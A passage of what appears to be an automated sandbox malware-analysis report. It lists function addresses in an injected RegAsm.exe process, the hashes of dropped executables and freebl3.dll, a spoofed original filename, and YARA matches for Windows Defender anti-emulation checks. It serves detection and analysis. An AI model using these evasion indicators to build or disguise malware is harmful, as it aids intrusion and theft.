                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E46402_2_6C0E4640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E9E502_2_6C0E9E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C112E4E2_2_6C112E4E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C136E632_2_6C136E63
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CC6702_2_6C0CC670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C12E6802_2_6C12E680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E5E902_2_6C0E5E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C124EA02_2_6C124EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1376E32_2_6C1376E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CBEF02_2_6C0CBEF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0DFEF02_2_6C0DFEF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1077102_2_6C107710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D9F002_2_6C0D9F00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1177A02_2_6C1177A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CDFE02_2_6C0CDFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F6FF02_2_6C0F6FF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D78102_2_6C0D7810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10B8202_2_6C10B820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1148202_2_6C114820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E88502_2_6C0E8850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0ED8502_2_6C0ED850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10F0702_2_6C10F070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F60A02_2_6C0F60A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1350C72_2_6C1350C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EC0E02_2_6C0EC0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1058E02_2_6C1058E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EA9402_2_6C0EA940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C11B9702_2_6C11B970
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C13B1702_2_6C13B170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0DD9602_2_6C0DD960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1051902_2_6C105190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1229902_2_6C122990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CC9A02_2_6C0CC9A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FD9B02_2_6C0FD9B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C109A602_2_6C109A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C13BA902_2_6C13BA90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C132AB02_2_6C132AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0C22A02_2_6C0C22A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F4AA02_2_6C0F4AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0DCAB02_2_6C0DCAB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C108AC02_2_6C108AC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10E2F02_2_6C10E2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E1AF02_2_6C0E1AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10D3202_2_6C10D320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0C53402_2_6C0C5340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0DC3702_2_6C0DC370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CF3802_2_6C0CF380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1353C82_2_6C1353C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C24AC302_2_6C24AC30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C236C002_2_6C236C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C17AC602_2_6C17AC60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1CECD02_2_6C1CECD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C16ECC02_2_6C16ECC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2F8D202_2_6C2F8D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C23ED702_2_6C23ED70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C29AD502_2_6C29AD50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C174DB02_2_6C174DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C206D902_2_6C206D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2FCDC02_2_6C2FCDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C250E202_2_6C250E20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C20EE702_2_6C20EE70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1F6E902_2_6C1F6E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C17AEC02_2_6C17AEC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C210EC02_2_6C210EC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C176F102_2_6C176F10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2B0F202_2_6C2B0F20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C232F702_2_6C232F70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1DEF402_2_6C1DEF40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2B8FB02_2_6C2B8FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C17EFB02_2_6C17EFB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C24EFF02_2_6C24EFF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C170FE02_2_6C170FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1C08202_2_6C1C0820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1FA8202_2_6C1FA820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2448402_2_6C244840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2768E02_2_6C2768E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1C69002_2_6C1C6900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1A89602_2_6C1A8960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2009A02_2_6C2009A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C22A9A02_2_6C22A9A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2309B02_2_6C2309B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C28C9E02_2_6C28C9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1A49F02_2_6C1A49F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C228A302_2_6C228A30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C21EA002_2_6C21EA00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1ECA702_2_6C1ECA70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1EEA802_2_6C1EEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C210BA02_2_6C210BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C276BE02_2_6C276BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1FA4302_2_6C1FA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1D44202_2_6C1D4420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1884602_2_6C188460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C29A4802_2_6C29A480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1B64D02_2_6C1B64D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C20A4D02_2_6C20A4D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2105702_2_6C210570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1C85402_2_6C1C8540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2745402_2_6C274540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2B85502_2_6C2B8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1D25602_2_6C1D2560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1645B02_2_6C1645B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C23A5E02_2_6C23A5E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1FE5F02_2_6C1FE5F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1CC6502_2_6C1CC650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C20E6E02_2_6C20E6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1946D02_2_6C1946D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1CE6E02_2_6C1CE6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1F07002_2_6C1F0700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C19A7D02_2_6C19A7D0
                Source: C:\ProgramData\KKJEBAAECB.exeCode function: 6_2_00C50B3A6_2_00C50B3A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043681D9_2_0043681D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040CC809_2_0040CC80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C69D9_2_0040C69D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041E8509_2_0041E850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043B0509_2_0043B050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042D0569_2_0042D056
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042285E9_2_0042285E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004088709_2_00408870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004098109_2_00409810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004300359_2_00430035
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042E8D79_2_0042E8D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E0809_2_0043E080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004020AD9_2_004020AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041F8B79_2_0041F8B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004361509_2_00436150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004209709_2_00420970
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004151729_2_00415172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043F9E09_2_0043F9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042D9EB9_2_0042D9EB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004081909_2_00408190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043D9AD9_2_0043D9AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004211B09_2_004211B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042C9B79_2_0042C9B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00405A409_2_00405A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00429A499_2_00429A49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004262069_2_00426206
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042BADA9_2_0042BADA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042A2DC9_2_0042A2DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004122E69_2_004122E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042E2AC9_2_0042E2AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004203609_2_00420360
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00411B6E9_2_00411B6E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00424B709_2_00424B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004013309_2_00401330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427B309_2_00427B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004323DD9_2_004323DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004063E09_2_004063E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407B809_2_00407B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040DB909_2_0040DB90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E3909_2_0043E390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00425B9D9_2_00425B9D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004223B59_2_004223B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043DC709_2_0043DC70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00404C209_2_00404C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042F4C79_2_0042F4C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040D4D09_2_0040D4D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00435CD09_2_00435CD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041A4EA9_2_0041A4EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00433D5E9_2_00433D5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F5789_2_0040F578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A5009_2_0040A500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042C5219_2_0042C521
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00420D309_2_00420D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004315309_2_00431530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004285359_2_00428535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043D5DE9_2_0043D5DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CDED9_2_0041CDED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00421DB59_2_00421DB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042AE2B9_2_0042AE2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041E6C09_2_0041E6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043F6F09_2_0043F6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004306F79_2_004306F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406E809_2_00406E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00436E829_2_00436E82
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00430EAE9_2_00430EAE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00401FC59_2_00401FC5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00404FD09_2_00404FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00418FD59_2_00418FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00402FE09_2_00402FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004357E09_2_004357E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042EF899_2_0042EF89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043DF909_2_0043DF90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004237A09_2_004237A0
                Source: C:\ProgramData\KJKJJJECFI.exeCode function: 10_2_00840B4410_2_00840B44
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DAC61E012_2_1DAC61E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DAD392012_2_1DAD3920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DACD10012_2_1DACD100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DACFD5012_2_1DACFD50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DAA9CC012_2_1DAA9CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DAAF8D012_2_1DAAF8D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DAA943012_2_1DAA9430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DAAA2C012_2_1DAAA2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DAD16D012_2_1DAD16D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DB39F8012_2_1DB39F80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DB1AEBE12_2_1DB1AEBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DB39A2012_2_1DB39A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DB3939012_2_1DB39390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1D954CF012_2_1D954CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1D97781012_2_1D977810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1D95900012_2_1D959000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1D94EA8012_2_1D94EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1D9566C012_2_1D9566C0
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\KJKJJJECFI.exe 5923793C30ACF9026A872FCB8CE04A671FA194BB4F73EEF165D687AE97683047
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\KKJEBAAECB.exe 353871B38BB73FFB940B773C92849796C4C71949D5FFC9EA55103A8F41DABB74
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C2FDAE0 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040AA20 appears 134 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C1094D0 appears 90 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C2F09D0 appears 172 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C199B10 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040A310 appears 59 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C0FCBE8 appears 134 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004020FD appears 287 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041A3AC appears 77 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C193620 appears 42 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C2FD930 appears 33 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1760
                Source: file.exeStatic PE information: invalid certificate
                Source: file.exe, 00000000.00000000.1637407171.0000000000900000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAUTOFMT.EXEj% vs file.exe
                Source: file.exe, 00000000.00000002.1639431467.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exeBinary or memory string: OriginalFilenameAUTOFMT.EXEj% vs file.exe
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
